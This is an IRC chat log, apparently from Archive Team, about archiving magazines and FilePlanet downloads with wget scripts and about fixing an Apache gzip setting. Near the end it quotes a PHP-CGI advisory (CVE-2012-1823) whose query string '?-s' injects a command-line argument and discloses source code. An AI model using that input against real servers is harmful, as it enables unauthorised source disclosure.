Time |
Nickname |
Message |
01:23
๐
|
DFJustin |
http://consumerist.com/2012/05/rock-band-for-iphone-game-will-self-destruct-in-29-days.html |
01:30
๐
|
BlueMax |
let's archive it! and break a million laws in the process! |
01:33
๐
|
underscor |
http://i.imgur.com/IP8pI.jpg |
01:46
๐
|
dashcloud |
actually- no it won't: http://www.theverge.com/gaming/2012/5/2/2995299/ea-rock-band-ios |
02:48
๐
|
chronomex |
yaay laws |
02:49
๐
|
SketchCow |
Nemo_bis: There are gaps in some of these runs of magazines - that's known, right |
03:05
๐
|
SketchCow |
AWWWWWWW shit |
03:05
๐
|
SketchCow |
I got the scanner running. |
03:49
๐
|
SketchCow |
http://archive.org/details/gamesmachine-034 |
06:06
๐
|
Nemo_bis |
SketchCow, what gaps? I sent you a list of all the stuff I was shipping you, with numbers included; that's all I know |
06:10
๐
|
Nemo_bis |
hm or maybe I didn't |
06:11
๐
|
Nemo_bis |
the main part of it was |
06:11
๐
|
Nemo_bis |
*Pc Action: 93 magazines, 46 floppy disks, 55 CD-ROMs/DVDs (1-7, 9-94) |
06:11
๐
|
Nemo_bis |
*Pc World: 160 CD-ROMs/DVDs, 3 booklets (1996-2010) |
06:11
๐
|
Nemo_bis |
*The Games Machine: 94 magazines (87-180), 197 CD-ROMs/DVDs |
06:11
๐
|
Nemo_bis |
Content: 187 magazines, 412 CD-ROMs/DVDs, 106 floppy disks, 6 books: |
06:12
๐
|
Nemo_bis |
I don't remember what I checked and I added some more stuff later. |
06:32
๐
|
SketchCow |
No worries |
06:32
๐
|
SketchCow |
I just wanted to make sure that when I was digitizing shizzle and then I was missing here and thee, I wasn't, you know, losing stuff. |
06:46
๐
|
SketchCow |
http://archive.org/details/gamesmachine-034 |
06:46
๐
|
SketchCow |
Tah dah!!! |
06:52
๐
|
Nemo_bis |
:D |
06:52
๐
|
Nemo_bis |
The file listing is empty |
06:53
๐
|
SketchCow |
Yeah, the new machine isn't loving ISO life. |
06:53
๐
|
SketchCow |
Anyway, minor setback. |
06:56
๐
|
Nemo_bis |
Internet Explorer 4.0 |
09:46
๐
|
SmileyG |
err |
09:46
๐
|
SmileyG |
how long ago was the "migrate videos from Google video to youtube" thing? |
09:50
๐
|
SmileyG |
as I *just* got notifcation of it and switched mine. |
11:23
๐
|
underscor |
SmileyG: Looong time |
11:23
๐
|
underscor |
Over 6 months ago |
11:23
๐
|
underscor |
probably like 9 |
11:25
๐
|
SmileyG |
heh weird. |
11:25
๐
|
SmileyG |
tho my videos were uploaded.... |
11:25
๐
|
* |
SmileyG can't rememder the date now, nov 2009 I think.,... |
13:42
๐
|
Schbirid |
i need wget help. i would like to mirror http://forum.jamendo.com/ but exclude any URLs that contain /comment/ /profile/ or /entry/ |
13:42
๐
|
Schbirid |
those are NOT directories, but arguments to index.php, eg http://forum.jamendo.com/index.php?p=/profile/331639/509 |
13:44
๐
|
aggro |
I thought the "--reject" argument took care of that. Can use it to get rid of links that have things like "&action=print," and aren't really different content. |
13:45
๐
|
Schbirid |
i thought that would only look at the extension (as in end of the url string) |
13:45
๐
|
Schbirid |
i totally asked this before i think |
13:45
๐
|
aggro |
I can test it right quick. Thought it could match patterns as well. |
13:45
๐
|
Schbirid |
yeah |
13:45
๐
|
Schbirid |
Note that if any of the wildcard characters, *, ?, [ or ], appear in an element of acclist or rejlist, it will be treated as a pattern, rather than a suffix. |
13:45
๐
|
Schbirid |
sweet |
13:54
๐
|
Schbirid |
can't figure it out. will resume later |
16:06
๐
|
Schbirid |
fileplanet is shutting down |
16:07
๐
|
Schbirid |
http://www.fileplanet.com/ |
16:07
๐
|
Schbirid |
"Note: FilePlanet is no longer being updated and is in the process of being archived." |
16:07
๐
|
Schbirid |
ha ha ha |
16:07
๐
|
Schbirid |
fuck |
16:07
๐
|
mistym |
"archived" |
16:07
๐
|
Schbirid |
fuckfuckfuck |
16:07
๐
|
Schbirid |
it's IGN |
16:07
๐
|
Schbirid |
should be fairly easy to grab, you can wget urls you get from the site without cookies |
16:07
๐
|
Schbirid |
iirc even the timestamps are correct |
16:09
๐
|
Schbirid |
the terrible thing is that many files are from the old hosted planet* sites and probably not listed on the fileplanet pages |
16:09
๐
|
mistym |
fileplanet isn't the one that requires an obnoxious downloader and has enforces browser useragent strings, is it? |
16:09
๐
|
* |
shaqfu tries |
16:10
๐
|
shaqfu |
No, seems to work fine |
16:11
๐
|
Schbirid |
i am logged in, so it might be different but example: |
16:11
๐
|
Schbirid |
http://www.fileplanet.com/224345/220000/fileinfo/Elder-Scrolls-V:-Skyrim---Macho-Dragons-v1.0 |
16:11
๐
|
Schbirid |
click download |
16:11
๐
|
Schbirid |
you get http://www.fileplanet.com/224345/download/Elder-Scrolls-V:-Skyrim---Macho-Dragons-v1.0 |
16:11
๐
|
Schbirid |
<a id="default-file-download-link" href="javascript:void();" onclick="window.location='http://m3x12.fileplanet.com/^542977820/ftp1/012012/Macho_Dragons_1_0.zip'">Click here</a> |
16:11
๐
|
Schbirid |
you can wget that just fine |
16:11
๐
|
shaqfu |
Phew |
16:12
๐
|
shaqfu |
Now I'm curious how far back their downloads go, given how old the site is |
16:12
๐
|
Schbirid |
they have a "Customer Support Fax" |
16:12
๐
|
Schbirid |
shaqfu: 1996 at least |
16:12
๐
|
shaqfu |
Yeah, I saw Half-Life 1 patches |
16:12
๐
|
Schbirid |
it started with planetquake and they migrated its downloads to fileplanet afaik |
16:12
๐
|
mistym |
Yeah, they're def. p. oldskool. I don't think they ever pruned stuff. |
16:13
๐
|
mistym |
"Customer Support Fax", wow. |
16:14
๐
|
Schbirid |
http://www.fileplanet.com/174/0/section/Gaming looks like a good starting point |
16:14
๐
|
shaqfu |
We should ask for a fax of their game demos... |
16:15
๐
|
Schbirid |
hm, 1999 for the oldest quake dm map |
16:15
๐
|
mistym |
Get a screenshot faxed back |
16:15
๐
|
SketchCow |
Adrian Chen - Gawker |
16:15
๐
|
mistym |
http://achewood.com/index.php?date=11222006 |
16:15
๐
|
Schbirid |
thanks for keeping this place gawker free |
16:15
๐
|
shaqfu |
Trying to get an interview? |
16:16
๐
|
shaqfu |
Or just hoping something interesting happens to write up a clickmagnet headline? |
16:16
๐
|
SketchCow |
I assume same. |
16:17
๐
|
SketchCow |
I also assume he'll do the Sekrit Maneuver of coming back in here under an "assumed name". |
16:19
๐
|
Schbirid |
heh, wget -m --spider http://www.fileplanet.com/ |
16:20
๐
|
Schbirid |
http://www.fileplanet.com/index.html works |
16:20
๐
|
yipdw |
"Jason Scott Bans Me From #archiveteam, Potentially Involved With Chickens" |
16:21
๐
|
yipdw |
or at least that's the caliber of writing Gawker seems to trade in |
16:21
๐
|
ersi |
lol! |
16:22
๐
|
Schbirid |
FPOps@IGN.com seems like a high contact |
16:22
๐
|
SketchCow |
Hey, some of you might know this. |
16:22
๐
|
SketchCow |
So, jsmess.textfiles.com no longer shows the javascript |
16:22
๐
|
SketchCow |
I know the big change - new apache server. |
16:22
๐
|
SketchCow |
But what's the setting to get it back? |
16:23
๐
|
ersi |
Do you get a 'download this javascript' file instead of the javascript? |
16:23
๐
|
ersi |
Or nothingness? |
16:24
๐
|
SketchCow |
Nothiness. Check it out. |
16:25
๐
|
yipdw |
SketchCow: it looks like the Content-Encoding header on the javascript is missing |
16:25
๐
|
SketchCow |
I am SURE it's a handler I don't have enabled. |
16:25
๐
|
SketchCow |
OK, where would I enable that in apache2.2 |
16:25
๐
|
SketchCow |
I went from 1.3 something to 2.2 something so it was a fairly nasty jump. |
16:25
๐
|
yipdw |
in an appropriate configuration file (httpd.conf, virtualhost config, etc): |
16:25
๐
|
yipdw |
<FilesMatch "\.js\.gz$"> |
16:25
๐
|
yipdw |
Header set Content-Encoding gzip |
16:25
๐
|
yipdw |
Header set Content-Type "text/javascript; charset=utf-8" |
16:25
๐
|
yipdw |
</FilesMatch> |
16:25
๐
|
yipdw |
I *think* that'llw ork |
16:27
๐
|
yipdw |
SketchCow: you can set that in a <VirtualHost> or <Directory> context, so scope to whichever one is most specific, etc |
16:27
๐
|
yipdw |
oh, fuck, I forgot that that needs mod_header loaded |
16:28
๐
|
yipdw |
well, maybe it's already loaded, we'll see |
16:30
๐
|
yipdw |
"You have already activated rake 0.9.2.2, but your Gemfile requires rake 0.9.2. Using bundle exec may solve this." |
16:30
๐
|
yipdw |
motherfucking christ I hate Ruby environments sometimes |
16:31
๐
|
SketchCow |
yipdw: Did it, no load |
16:31
๐
|
SketchCow |
LoadModule headers_module libexec/apache22/mod_headers.so |
16:31
๐
|
yipdw |
hmm |
16:31
๐
|
SketchCow |
it's definitely loading it. |
16:32
๐
|
yipdw |
hmm, ok |
16:32
๐
|
yipdw |
well, let's pull that FilesMatch thing out then |
16:33
๐
|
SketchCow |
I enabled compress |
16:33
๐
|
SketchCow |
already pulled |
16:33
๐
|
yipdw |
ok |
16:33
๐
|
SketchCow |
Still not working, but enabled compress. |
16:33
๐
|
yipdw |
the error Chrome is throwing is "Uncaught SyntaxError: Unexpected token ILLEGAL", so it's interpreting the gzipped javascript without decompressing it |
16:33
๐
|
yipdw |
I'm trying to figure out what combination of headers it needs to go "oh, this is gzipped" |
16:34
๐
|
Schbirid |
yay, we can go with http://www.fileplanet.com/NUMERICID/download/ |
16:34
๐
|
yipdw |
I thought Content-Encoding was it, and it probably is |
16:35
๐
|
Schbirid |
pretty slow though |
16:35
๐
|
yipdw |
but there's probably something else wrong in there |
16:35
๐
|
yipdw |
one sec |
16:35
๐
|
devesine |
it is both content-encoding and content-type |
16:36
๐
|
yipdw |
devesine: yeah, but I'm not sure what was wrong with either |
16:36
๐
|
devesine |
<FilesMatch .*\.js\.gz$> |
16:36
๐
|
devesine |
</FilesMatch> |
16:36
๐
|
devesine |
ForceType text/javascript |
16:36
๐
|
devesine |
Header set Content-Encoding: gzip |
16:36
๐
|
yipdw |
what does ForceType do that Header set Content-Type doesn't? |
16:36
๐
|
devesine |
heck if i know |
16:36
๐
|
yipdw |
uhh |
16:36
๐
|
Schbirid |
yeah, nice. the /download/ HTML includes both the direct download link AND the location of the file, eg "Home / Gaming / RPG / Massively Multiplayer / Gas Guzzlers: Combat Carnage / Game Clients" |
16:37
๐
|
devesine |
looks like it causes all internal apache bits to treat it as that type |
16:37
๐
|
yipdw |
wtf |
16:37
๐
|
devesine |
though i don't know what aside from the content-type header cares |
16:37
๐
|
yipdw |
wtf apache |
16:37
๐
|
yipdw |
well, ok |
16:37
๐
|
yipdw |
I guess that can be tried |
16:38
๐
|
yipdw |
I'm not sure why the default MIME type detection would screw it up |
16:38
๐
|
Schbirid |
mail to ign sent |
16:39
๐
|
devesine |
possibly the mime type Content-Type header gets set late in the process? |
16:39
๐
|
yipdw |
devesine: I dunno -> https://gist.github.com/14cb242afb08c4c6714a |
16:39
๐
|
devesine |
(it's been a blissfully long time since i had to know details about apache internals that fine-grained - these days i'm all about nginx) |
16:39
๐
|
yipdw |
that's what I got with the previous ForceMatch in place, which I thought would work |
16:39
๐
|
yipdw |
but evidently it didn't |
16:39
๐
|
yipdw |
and I'm not sure why |
16:40
๐
|
devesine |
huh, that looks reasonable to me |
16:40
๐
|
yipdw |
yeah, me too |
16:40
๐
|
yipdw |
unless the charset thing is screwing it up |
16:41
๐
|
Schbirid |
http://www.fileplanet.com/024884/download/ is the same as http://www.fileplanet.com/24884/download/ and they both work |
16:41
๐
|
yipdw |
where by "it" I mean Chrome |
16:42
๐
|
devesine |
https://gist.github.com/14cb242afb08c4c6714a#gistcomment-298537 is my server's response |
16:42
๐
|
yipdw |
it looks like Apache is doing the right things there, unless it's mangling the response body |
16:42
๐
|
devesine |
yeah, i'm using chrome too |
16:42
๐
|
yipdw |
hm |
16:42
๐
|
yipdw |
i wonder what happens with no charset set |
16:43
๐
|
devesine |
huh, i'm getting Content-Encoding: x-gzip back from jsmess.textfiles.com |
16:43
๐
|
devesine |
(in curl) |
16:44
๐
|
yipdw |
the configuration might have changed |
16:47
๐
|
devesine |
chrome thinks the headers I got back include |
16:47
๐
|
devesine |
Content-Type: application/x-gzip |
16:47
๐
|
Schbirid |
fuckers return 302 for non existing links... |
16:50
๐
|
Schbirid |
gah. can i not tell wget not to follow a 302 to a directory? |
16:50
๐
|
Schbirid |
"wget -X error http://www.fileplanet.com/1/download/" still downloads "http://www.fileplanet.com/error/error.shtml?aspxerrorpath=/autodownload.aspx" |
16:50
๐
|
devesine |
hm, chrome wasn't believing that the cache was cleared, it looks like |
16:51
๐
|
devesine |
clearing the cache, quitting chrome, starting it up again, clearing the cache, quitting chrome, starting it up again, and /then/ going to jsmess.textfiles.com loaded it fine |
16:53
๐
|
Schbirid |
http://blog.jamendo.com/2012/05/03/response-to-the-community/ |
17:03
๐
|
Schbirid |
i wonder how soon fileplanet links expire |
17:12
๐
|
Schbirid |
so, we need to download http://www.fileplanet.com/NUMERICID/download/ , grep that file for the dl link. and download the file (to the same dir i guess, sorting can happen later) |
17:12
๐
|
Schbirid |
i love bash |
17:14
๐
|
Schbirid |
and jedit |
17:16
๐
|
Schbirid |
hm, the actual download links are interesting too. eg /ftp1/fpnew/action/quake/levels/dm/armory2.zip |
17:17
๐
|
Schbirid |
not sure if i should rather save the files in that part or in www.fileplanet.com/NUMERICID/download/ |
17:17
๐
|
Schbirid |
thoughts? |
17:19
๐
|
Schbirid |
nah |
17:19
๐
|
Schbirid |
the url is saved so if needed one could do that later |
17:21
๐
|
Schbirid |
script is ready \o/ |
17:22
๐
|
Schbirid |
hm, any suggestion how i can make a loop like: for i in {$1..$2}? |
17:22
๐
|
Schbirid |
i would like to pass the starting and last id to download from the commandline |
17:22
๐
|
Schbirid |
doing this i get "{1466..1470}" |
17:22
๐
|
Schbirid |
for $i itself |
17:23
๐
|
Schbirid |
"for i in $(seq $1 $2)" seems to work |
17:24
๐
|
bayleef` |
maybe for i in {$1..$2}? |
17:24
๐
|
Schbirid |
nope, that was my first try |
17:25
๐
|
bayleef` |
Ah |
17:25
๐
|
Schbirid |
this works great, yay |
17:25
๐
|
* |
bayleef` grins |
17:34
๐
|
SketchCow |
http://jsmess.textfiles.com/ is back. Thanks for the help, everyone. |
17:34
๐
|
SketchCow |
As a bonus - some keys work! |
17:36
๐
|
Schbirid |
https://github.com/SpiritQuaddicted/fileplanet-file-download/blob/master/download_pages_and_files_from_fileplanet.sh |
17:36
๐
|
Schbirid |
we'll need to assign ranges. starting from 1 and ending somewhere in 200k |
17:36
๐
|
Schbirid |
it takes about one second for non-existing IDs so far |
17:36
๐
|
Schbirid |
the downloads much be big |
17:39
๐
|
Schbirid |
i'll start with 1-2000 just to see what happens |
17:39
๐
|
shaqfu |
Looks good |
17:40
๐
|
shaqfu |
Is it roughly chronological in terms of file ID? |
17:40
๐
|
Schbirid |
yeah, i think very much so |
17:40
๐
|
shaqfu |
Gotcha. Should go quicker early, then |
17:43
๐
|
shaqfu |
If it does its job, let me know and I'll run it |
17:46
๐
|
Schbirid |
sweet :) |
17:47
๐
|
Schbirid |
ahaha http://www.kb.cert.org/vuls/id/520827 |
17:49
๐
|
shaqfu |
I'll give it a shot now, actually, on 2001-4000 |
17:49
๐
|
Schbirid |
thanks |
17:50
๐
|
Schbirid |
http://jsdosbox.appspot.com |
17:54
๐
|
Schbirid |
<15 minutes per 1k so far |
17:54
๐
|
Schbirid |
but only single digits of actual found files ;) |
17:55
๐
|
Schbirid |
and i am quake fanatic enough to know all of them |
17:55
๐
|
Schbirid |
i'll go 4001-10000 |
17:56
๐
|
shaqfu |
Sigh; I really need to get a real OS on this server, and not one with flaky wget that doesn't have --max-redirect |
17:57
๐
|
Schbirid |
haha |
17:59
๐
|
shaqfu |
Got it this time; doing 10k-15k |
17:59
๐
|
Schbirid |
yay |
18:00
๐
|
shaqfu |
Seems to be moving a bit slower for me, although those are probably much larger files than Quake maps |
18:01
๐
|
Schbirid |
might also be just fileplanet sucking |
18:01
๐
|
shaqfu |
That too |
18:01
๐
|
Schbirid |
eralier i sometimes had 5-10 seconds per html page download |
18:03
๐
|
Schbirid |
hm, i have a bug |
18:04
๐
|
shaqfu |
? |
18:05
๐
|
shaqfu |
And it looks like there are ~220k fileIDs... |
18:05
๐
|
Schbirid |
ah, haha. i try to download even if there is no link. so files_$1_$2.log gets a lot of "http://: Invalid host name." |
18:05
๐
|
Schbirid |
i should make that nicer really |
18:05
๐
|
Schbirid |
scared me for a moment |
18:05
๐
|
shaqfu |
Ah, phew; nothing critical then |
18:06
๐
|
DFJustin |
holy hell this jsdosbox |
18:25
๐
|
SketchCow |
Feel inspired. |
18:32
๐
|
Schbirid |
doing fileplanet 15k-16k |
18:36
๐
|
shaqfu |
Are there any IGN network sites at-risk like this? |
18:36
๐
|
shaqfu |
any other* |
18:37
๐
|
Schbirid |
i'd consider them all at risk :( |
18:38
๐
|
Schbirid |
interesting, the new planet* files are not served from fileplanet anymore, i never noticed |
18:38
๐
|
Schbirid |
eg http://planetquake.gamespy.com/View.php?view=Quake4.Detail&id=157 |
18:39
๐
|
shaqfu |
I don't see the warnings on planetquake; guess it's not at immediate risk |
18:39
๐
|
Schbirid |
haha, no way. they seem to have dropped forumplanet without any notice |
18:39
๐
|
Schbirid |
wtf |
18:40
๐
|
Schbirid |
jesus |
18:40
๐
|
Schbirid |
and i mirrored by pure random intend |
18:40
๐
|
shaqfu |
Ouch |
19:01
๐
|
Schbirid |
hm, the forums might just have been moved. eg http://www.ign.com/boards/forums/diablo.5218/ exists |
19:47
๐
|
Schbirid |
15k-16k took 70 minutes |
19:47
๐
|
Schbirid |
~300 mb |
19:48
๐
|
Schbirid |
bedtime for me. anything above 16k is free |
19:48
๐
|
Schbirid |
night |
21:33
๐
|
closure |
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ I'll bet this is how the old wiki kept getting hacked |
21:33
๐
|
closure |
(current one does not seem vulnerable) |
21:36
๐
|
Ymgve |
does your old wiki use php-cgi? |
21:37
๐
|
closure |
according to the page, it was a common configuration on dreamhost |
21:37
๐
|
mistym |
Oh PHP. |
21:37
๐
|
Ymgve |
oh |
21:41
๐
|
shaqfu |
Oh Dreamhost |
21:41
๐
|
mistym |
That too... |
21:49
๐
|
shaqfu |
Well, today's foray into scripting taught me something: line breaks suck |
22:03
๐
|
yipdw |
"We found that giving the query string รขยย?-sรขยย somehow resulted in the รขยย-sรขยย command line argument being passed to php, resulting in source code disclosure." |
22:03
๐
|
yipdw |
what the fuck |
22:03
๐
|
chronomex |
not "somehow", some guy removed protection against that in like 2004 because it made unit testing more complicated |
22:05
๐
|
yipdw |
unit testing of what |
22:05
๐
|
yipdw |
I guess I should look at the commit history |
22:05
๐
|
chronomex |
probably unit testing that didn't exist |
22:06
๐
|
yipdw |
because the fact that an application query string can affect the command line seems ridiculous on its face |
22:06
๐
|
chronomex |
the query string is commandlineified |
22:06
๐
|
chronomex |
I probably sound like I'm making excuses, don't I? |
22:07
๐
|
yipdw |
oh |
22:07
๐
|
chronomex |
fuck those guys. they couldn't program themselves out of a paper bag. |
22:07
๐
|
yipdw |
"From the regression testing system we |
22:07
๐
|
yipdw |
use -d extensively to override ini settings to make sure our test |
22:07
๐
|
yipdw |
environment is sane." |
22:07
๐
|
yipdw |
that's still a what teh fuck |
22:07
๐
|
yipdw |
why not just put in a "sane" ini file as a precondition |
22:07
๐
|
chronomex |
too complicated |
22:46
๐
|
ersi |
yipdw: Testing is hard. |